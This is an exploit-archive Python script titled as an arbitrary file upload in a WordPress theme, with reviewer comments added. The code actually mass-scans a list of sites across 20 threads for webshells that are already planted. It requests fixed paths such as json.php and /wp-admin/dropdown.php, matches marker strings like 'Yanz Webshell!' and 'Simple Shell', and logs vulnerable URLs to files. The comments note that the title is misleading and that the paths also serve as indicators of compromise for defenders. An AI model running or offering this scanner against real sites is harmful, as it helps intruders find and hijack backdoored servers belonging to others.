# Exploit Title: WordPress Theme Travelscape v1.0.3 - Arbitrary File Upload
# Date: 2024-04-01
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
#
# NOTE(review): this listing reached the corpus with every line break and all
# indentation stripped (two string literals were even split mid-literal). The
# layout below is reconstructed from the token sequence; the nesting of the
# if/else chains inside check_security() is the most plausible reading of
# that sequence, not a verified one.
#
# NOTE(review): despite the title, nothing in the visible code uploads
# anything. Every probe is a GET to a fixed path followed by a substring test
# on the response body ('MSQ_403', 'Yanz Webshell!', '#0x2525', 'Uname:',
# 'Simple Shell'), i.e. the script looks for backdoor/webshell artifacts that
# are *already present* on a site and records the hits in local text files.
# For a site owner the same path/marker pairs are detection signatures: the
# presence of those files in a webroot, or of those paths in access logs, is
# an indicator of a prior compromise rather than of a vulnerability.
import sys
import os.path
import requests
import re                      # unused in the visible code
import urllib3                 # unused; warnings are silenced via requests.urllib3 below
from requests.exceptions import SSLError  # imported but never caught explicitly
from multiprocessing.dummy import Pool as ThreadPool  # thread-backed pool, not processes
from colorama import Fore, init

init(autoreset=True)
error_color = Fore.RED
info_color = Fore.CYAN
success_color = Fore.GREEN
highlight_color = Fore.MAGENTA  # defined but unused in the visible code

# Silences urllib3's InsecureRequestWarning for the verify=False calls below,
# so certificate failures on those probes go entirely unreported.
requests.urllib3.disable_warnings()

# Static headers sent with every probe. The User-Agent is a mobile Chrome
# string and the Referer is a bare host with no scheme; neither affects the
# checks themselves, which only look at the response body.
headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'Referer': 'www.google.com'
}


def URLdomain(url: str) -> str:
    """Reduce *url* to its host (plus port, if any).

    A leading "http://" or "https://" is removed (the replace() only runs
    when the string starts with that scheme), then everything from the
    first "/" onward is discarded. Anything else -- other schemes, userinfo,
    a query string with no path -- passes through untouched. An empty string
    comes back empty.
    """
    if url.startswith("http://"):
        url = url.replace("http://", "")
    elif url.startswith("https://"):
        url = url.replace("https://", "")
    if '/' in url:
        url = url.split('/')[0]
    return url


def check_security(url: str) -> None:
    """Probe one host for known webshell/backdoor markers and log the hits.

    *url* is reduced to its host via URLdomain() and then re-prefixed with
    "http://" or "https://" before each group of probes, so later probes
    in the chain use whichever scheme the previous group left behind. Each
    probe is a GET with a 15 s timeout; a fixed marker string is searched
    for in the body and, on a hit, the full probed URL is appended to a
    local results file ('MSQ_403.txt', 'wso.txt', 'digital-download.txt',
    'dummyyummy.txt'). Nothing is returned; all output goes to stdout and
    those files.

    Points worth knowing before running or reading this:
    - open(...).write(...) never closes the handle explicitly; it relies on
      CPython refcounting. With the 20-thread pool in main() several threads
      append to the same file with no lock, so lines may interleave.
    - verify=False is passed on some https probes but not on others
      (about.php, digital-download/new.php), so on hosts with an untrusted
      certificate those probes raise SSLError, which lands in the catch-all
      below and abandons the rest of the chain for that host.
    - The https fallback of the first group probes a different theme path
      (aahana) than the http attempt (travelscape).
    - `except Exception` swallows every failure -- DNS, connection refused,
      timeout, TLS -- and prints one "[Failed] due to:" line.
    """
    fg = success_color
    fr = error_color
    try:
        # --- group 1: 'MSQ_403' marker under two theme paths ---------------
        url = 'http://' + URLdomain(url)
        check = requests.get(url + '/wp-content/themes/travelscape/json.php', headers=headers, allow_redirects=True, timeout=15)
        if 'MSQ_403' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/travelscape/json.php\n')
        else:
            # Retry over https against a different theme path; certificate
            # errors are ignored here (verify=False).
            url = 'https://' + URLdomain(url)
            check = requests.get(url + '/wp-content/themes/aahana/json.php', headers=headers, allow_redirects=True, verify=False, timeout=15)
            if 'MSQ_403' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/aahana/json.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
        # --- group 2: 'Yanz Webshell!' / '#0x2525' markers ------------------
        # Uses whatever scheme `url` currently carries (http after a group-1
        # hit, https otherwise).
        check = requests.get(url + '/wp-content/themes/travel/issue.php', headers=headers, allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/wp-content/themes/travel/issue.php\n')
        else:
            url = 'https://' + URLdomain(url)
            # No verify=False on this https probe: an untrusted cert raises
            # SSLError and aborts the rest of this host's chain.
            check = requests.get(url + '/about.php', headers=headers, allow_redirects=True, timeout=15)
            if 'Yanz Webshell!' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('wso.txt', 'a').write(url + '/about.php\n')
            else:
                url = 'https://' + URLdomain(url)
                # Same certificate caveat as the about.php probe above.
                check = requests.get(url + '/wp-content/themes/digital-download/new.php', headers=headers, allow_redirects=True, timeout=15)
                if '#0x2525' in check.text:
                    print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                    open('digital-download.txt', 'a').write(url + '/wp-content/themes/digital-download/new.php\n')
                else:
                    print(' -| ' + url + ' --> {}[Failed]'.format(fr))
        # --- group 3: 'Uname:' marker over plain http -----------------------
        url = 'http://' + URLdomain(url)
        check = requests.get(url + '/epinyins.php', headers=headers, allow_redirects=True, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/epinyins.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))
        # --- group 4: 'Uname:' / 'Simple Shell' markers over https ----------
        url = 'https://' + URLdomain(url)
        check = requests.get(url + '/wp-admin/dropdown.php', headers=headers, allow_redirects=True, verify=False, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url + '/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers, allow_redirects=True, verify=False, timeout=15)
            if 'Simple Shell' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('dummyyummy.txt', 'a').write(url + '/wp-content/plugins/dummyyummy/wp-signup.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
    except Exception as e:
        # Catch-all: any network/TLS/parsing error for this host ends here.
        print(f' -| {url} --> {fr}[Failed] due to: {e}')


def main() -> None:
    """Read a list of URLs (one per line) and run check_security() on each.

    The file path comes from argv[1], or from an interactive prompt when no
    argument was given. Exits with status 1 if the path is not an existing
    file or the file cannot be read. Lines are stripped but not otherwise
    validated, so a blank line reaches check_security() as "" and ends up in
    its catch-all handler. The work is fanned out over a 20-thread pool;
    check_security() writes its results itself, so nothing is collected from
    pool.map().
    """
    try:
        url_file_path = sys.argv[1]
    except IndexError:
        url_file_path = input(f"{info_color}Enter the path to the file containing URLs: ")
    if not os.path.isfile(url_file_path):
        print(f"{error_color}[ERROR] The specified file path is invalid.")
        sys.exit(1)
    try:
        # The handle from open() is never closed explicitly; a `with` block
        # would be the usual form. The whole file is materialised at once.
        urls_to_check = [line.strip() for line in open(url_file_path, 'r', encoding='utf-8').readlines()]
    except Exception as e:
        print(f"{error_color}[ERROR] An error occurred while reading the file: {e}")
        sys.exit(1)
    # 20 concurrent workers; they share the result files without locking.
    pool = ThreadPool(20)
    pool.map(check_security, urls_to_check)
    pool.close()
    pool.join()
    print(f"{info_color}Security check process completed successfully. Results are saved in corresponding files.")


if __name__ == "__main__":
    main()